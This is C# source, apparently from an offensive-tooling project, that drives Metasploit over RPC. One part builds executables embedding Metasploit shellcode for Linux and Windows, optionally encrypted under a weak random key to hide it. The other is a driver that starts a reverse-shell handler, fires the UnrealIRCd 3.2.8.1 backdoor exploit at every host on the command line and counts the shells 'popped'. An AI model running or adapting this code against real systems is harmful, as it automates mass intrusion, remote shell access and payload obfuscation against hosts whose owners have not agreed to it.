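/// <summary>
/// Click handler for the "generate" button. Renders the embedded C# template
/// with the payloads Metasploit produces for every entry in <c>_newPayloads</c>,
/// compiles the result with <c>gmcs</c> and reports where the binary ended up.
/// </summary>
/// <param name="sender">GTK event source (unused).</param>
/// <param name="e">GTK event arguments (unused).</param>
/// <remarks>
/// Every failure is reported through a GTK <c>MessageDialog</c> and the method
/// returns; it no longer falls through and compiles a template whose
/// <c>{{...}}</c> markers were never filled.
/// NOTE(review): the generated source and binary are written to the shared
/// temp directory with default permissions, and <c>gmcs</c> is resolved via
/// PATH — keep both in mind on multi-user hosts.
/// </remarks>
void HandleClicked(object sender, EventArgs e)
{
    bool encrypted = _encrypted.Active;
    string rsrc = encrypted
        ? "MetasploitPayloadUtility.EncryptedTemplate.txt"
        : "MetasploitPayloadUtility.GeneralTemplate.txt";

    string template = LoadEmbeddedTemplate(rsrc);
    if (template == null)
    {
        ShowGenerationWarning("Generating payload failed.\n\nEmbedded template '" + rsrc + "' was not found.");
        return;
    }

    // One C# "byte[][]" initializer per platform/arch bucket. Each is closed
    // with "};" below and substituted for the matching marker in the template.
    string[] buckets = new string[BucketCount];
    for (int i = 0; i < buckets.Length; i++)
    {
        buckets[i] = "payload = new byte[][] {";
    }

    try
    {
        if (!encrypted)
        {
            foreach (var pair in _newPayloads)
            {
                pair.Value["Format"] = "csharp";
                var response = _manager.ExecuteModule("payload", pair.Key, pair.Value);
                if (IsModuleError(response))
                {
                    ShowGenerationWarning("Generating payload failed.\n\n" + DescribeModuleError(response));
                    return;
                }
                // The csharp format yields "byte[] buf = new byte[N] { ... };".
                // Keep everything after '=' and turn the trailing ';' into the
                // separator between elements of the outer byte[][] initializer.
                string csharpSource = response["payload"] as string;
                if (csharpSource == null)
                {
                    throw new InvalidOperationException("Module " + pair.Key + " did not return a csharp-formatted payload.");
                }
                buckets[BucketFor(pair.Key)] += csharpSource.Split('=')[1].Replace(";", ",");
            }
        }
        else
        {
            // Four random uppercase letters (A-Z) are prefixed to every payload
            // before encryption; the encrypted template receives the same
            // letters through {{parity}}. Presumably it uses them to recognise
            // a successful decryption — TODO confirm against the template.
            byte[] parity = new byte[ParityLength];
            for (int i = 0; i < parity.Length; i++)
            {
                parity[i] = (byte)('A' + _random.Next(26));
            }

            foreach (var pair in _newPayloads)
            {
                pair.Value["Format"] = "raw";
                var response = _manager.ExecuteModule("payload", pair.Key, pair.Value);
                if (IsModuleError(response))
                {
                    ShowGenerationWarning("Generating payload failed.\n\n" + DescribeModuleError(response));
                    return;
                }
                byte[] raw = response["payload"] as byte[];
                if (raw == null)
                {
                    throw new InvalidOperationException("Module " + pair.Key + " did not return a raw byte[] payload.");
                }
                // NOTE(review): the passphrase handed to EncryptData() is
                // _random.Next(1023).ToString() — at most 1023 distinct values
                // per payload, so this obscures the shellcode rather than
                // protecting it. Left as-is because the template must be able
                // to recover the key on its own.
                string key = _random.Next(1023).ToString();
                byte[] framed = WithParityPrefix(parity, raw);
                buckets[BucketFor(pair.Key)] += GetByteArrayString(EncryptData(framed, key));
            }

            // GetByteArrayString() ends with a trailing separator character that
            // the template's {{parity}} slot does not want.
            string par = GetByteArrayString(parity);
            template = template.Replace("{{parity}}", par.Remove(par.Length - 1));
        }
    }
    catch
    {
        ShowGenerationWarning("Generating payload failed.\n\nPlease ensure all required (*) options are present and valid.\n\nIf you are sure options are correct, please file a bug.");
        // Bug fix: do not go on to write and compile a half-filled template.
        return;
    }

    template = template.Replace("{{lin64}}", buckets[BucketLinux64] + "};");
    template = template.Replace("{{lin86}}", buckets[BucketLinux86] + "};");
    template = template.Replace("{{win64}}", buckets[BucketWindows64] + "};");
    template = template.Replace("{{win86}}", buckets[BucketWindows86] + "};");

    // gmcs names its output after the source file, so the binary is expected
    // next to the source as "<guid>.exe" (same assumption as before).
    string sourcePath = System.IO.Path.Combine(System.IO.Path.GetTempPath(), Guid.NewGuid().ToString());
    string binaryPath = sourcePath + ".exe";
    File.WriteAllText(sourcePath, template);

    int exitCode;
    try
    {
        exitCode = RunCompiler(sourcePath);
    }
    catch (System.ComponentModel.Win32Exception ex)
    {
        // gmcs missing from PATH (or not executable) used to surface as an
        // unhandled exception after the template had already been written.
        ShowGenerationWarning("Compiling payload failed.\n\nCould not start gmcs: " + ex.Message + "\n\nThe source is located at: " + sourcePath);
        return;
    }
    if (exitCode != 0)
    {
        ShowGenerationWarning("Compiling payload failed.\n\ngmcs exited with code " + exitCode + ".\n\nThe source is located at: " + sourcePath);
        return;
    }

    ShowGenerationWarning("Your binary is located at: " + binaryPath);
}

// Indices into the per-platform initializer buckets used by HandleClicked.
const int BucketLinux86 = 0;
const int BucketLinux64 = 1;
const int BucketWindows64 = 2;
const int BucketWindows86 = 3;
const int BucketCount = 4;
// Number of marker bytes prefixed to each payload in encrypted mode.
const int ParityLength = 4;

/// <summary>Reads an embedded text resource; returns null when it does not exist.</summary>
static string LoadEmbeddedTemplate(string resourceName)
{
    Assembly asm = Assembly.GetExecutingAssembly();
    using (Stream stream = asm.GetManifestResourceStream(resourceName))
    {
        if (stream == null)
        {
            return null;
        }
        using (StreamReader rdr = new StreamReader(stream))
        {
            return rdr.ReadToEnd();
        }
    }
}

/// <summary>
/// Maps a payload module name to its template bucket. Anything that is not
/// linux/osx x86, linux/osx x64 or windows/x64 is treated as windows/x86,
/// exactly as the original if/else chain did.
/// </summary>
static int BucketFor(string moduleName)
{
    if (moduleName.StartsWith("linux/x86") || moduleName.StartsWith("osx/x86"))
    {
        return BucketLinux86;
    }
    if (moduleName.StartsWith("linux/x64") || moduleName.StartsWith("osx/x64"))
    {
        return BucketLinux64;
    }
    if (moduleName.StartsWith("windows/x64"))
    {
        return BucketWindows64;
    }
    return BucketWindows86;
}

/// <summary>
/// True when the RPC response describes a failure rather than a payload.
/// The original relied solely on the response having six entries; the
/// explicit "error_message" check is added because that count is fragile.
/// </summary>
static bool IsModuleError(Dictionary<string, object> response)
{
    return response.ContainsKey("error_message") || response.Count == 6;
}

/// <summary>Human-readable error text for a failed module response.</summary>
static string DescribeModuleError(Dictionary<string, object> response)
{
    object message;
    if (response.TryGetValue("error_message", out message) && message != null)
    {
        return message.ToString();
    }
    return "unexpected response from the RPC server";
}

/// <summary>
/// Returns parity followed by the complete payload. The original copy loop
/// stopped at payload.Length inside the larger buffer and silently dropped
/// the last four bytes of every payload.
/// </summary>
static byte[] WithParityPrefix(byte[] parity, byte[] payload)
{
    byte[] framed = new byte[parity.Length + payload.Length];
    Buffer.BlockCopy(parity, 0, framed, 0, parity.Length);
    Buffer.BlockCopy(payload, 0, framed, parity.Length, payload.Length);
    return framed;
}

/// <summary>
/// Runs gmcs on the given source file and returns its exit code. The path is
/// quoted so a temp directory containing spaces still compiles.
/// </summary>
static int RunCompiler(string sourcePath)
{
    using (System.Diagnostics.Process process = new System.Diagnostics.Process())
    {
        process.StartInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
        process.StartInfo.FileName = "gmcs";
        process.StartInfo.Arguments = "\"" + sourcePath + "\"";
        process.Start();
        process.WaitForExit();
        return process.ExitCode;
    }
}

/// <summary>Shows a modal warning dialog owned by this window and waits for it to close.</summary>
void ShowGenerationWarning(string message)
{
    MessageDialog md = new MessageDialog(this, DialogFlags.DestroyWithParent, MessageType.Warning, ButtonsType.Close, message);
    md.Run();
    md.Destroy();
}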
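/// <summary>
/// Demo driver: starts one multi/handler for a reverse shell, fires the
/// unreal_ircd_3281_backdoor exploit at every host on the command line, waits
/// until no exploit job is listed any more, stops the handler and reports how
/// many sessions exist.
/// </summary>
/// <param name="args">Target hosts (RHOST values), one per argument.</param>
/// <remarks>
/// Connection settings are read from the environment so that no credentials
/// live in source: MSF_USER, MSF_PASS, MSF_API (RPC endpoint URL), MSF_LHOST
/// and MSF_LPORT. Each falls back to the value the original demo hard-coded.
/// The default endpoint is plain http://, so the password and session token
/// cross the link unencrypted — use an https:// endpoint if the RPC daemon
/// is not on the local host.
/// </remarks>
public static void Main(string[] args)
{
    string user = Environment.GetEnvironmentVariable("MSF_USER") ?? "user";
    string pass = Environment.GetEnvironmentVariable("MSF_PASS") ?? "pass";
    string api = Environment.GetEnvironmentVariable("MSF_API") ?? "http://127.0.0.1:55553/api";
    string lhost = Environment.GetEnvironmentVariable("MSF_LHOST") ?? "192.168.1.31";
    string lport = Environment.GetEnvironmentVariable("MSF_LPORT") ?? "4444";

    const string Payload = "cmd/unix/reverse";
    const string ExploitModule = "unix/irc/unreal_ircd_3281_backdoor";
    // This is how the job appears among ListJobs() values while it is running.
    const string ExploitJobName = "Exploit: " + ExploitModule;

    using (MetasploitSession session = new MetasploitSession(user, pass, api))
    {
        if (string.IsNullOrEmpty(session.Token))
        {
            throw new InvalidOperationException("Login failed. Check credentials");
        }

        using (MetasploitManager manager = new MetasploitManager(session))
        {
            // A single handler receives every callback; DisablePayloadHandler
            // below stops each exploit from spawning its own.
            Dictionary<string, object> handlerOpts = new Dictionary<string, object>
            {
                { "ExitOnSession", "false" },
                { "PAYLOAD", Payload },
                { "LHOST", lhost },
                { "LPORT", lport },
            };
            Dictionary<string, object> response = manager.ExecuteModule("exploit", "multi/handler", handlerOpts);
            if (!response.ContainsKey("job_id"))
            {
                // The original indexed "job_id" blindly and threw KeyNotFound.
                throw new InvalidOperationException("Starting multi/handler failed: " + DescribeRpcError(response));
            }
            string jobId = response["job_id"].ToString();

            try
            {
                foreach (string ip in args)
                {
                    Dictionary<string, object> opts = new Dictionary<string, object>
                    {
                        { "RHOST", ip },
                        { "DisablePayloadHandler", "true" },
                        { "LHOST", lhost },
                        { "LPORT", lport },
                        { "PAYLOAD", Payload },
                    };
                    response = manager.ExecuteModule("exploit", ExploitModule, opts);
                    if (response.ContainsKey("error_message"))
                    {
                        // Report and move on; one bad host should not abort the run.
                        Console.WriteLine("Exploit against " + ip + " failed: " + response["error_message"]);
                    }
                }

                // Poll until no exploit job is listed. As in the original there
                // is no upper bound: a job that never finishes blocks forever.
                while (new List<object>(manager.ListJobs().Values).Contains(ExploitJobName))
                {
                    Console.WriteLine("Waiting");
                    System.Threading.Thread.Sleep(6000);
                }
            }
            finally
            {
                // Always tear the handler down, even when an RPC call threw;
                // otherwise the listener is left running on the server.
                manager.StopJob(jobId);
            }

            response = manager.ListSessions();
            Console.WriteLine("I popped " + response.Count + " shells. Awesome.");

            Dictionary<string, object> compatible = manager.GetModuleCompatibleSessions("multi/general/execute");
            Console.WriteLine(compatible.Count + " session(s) are compatible with multi/general/execute.");
        }
    }
}

/// <summary>Human-readable error text for a failed RPC response.</summary>
static string DescribeRpcError(Dictionary<string, object> response)
{
    object message;
    if (response.TryGetValue("error_message", out message) && message != null)
    {
        return message.ToString();
    }
    return "unexpected response from the RPC server";
}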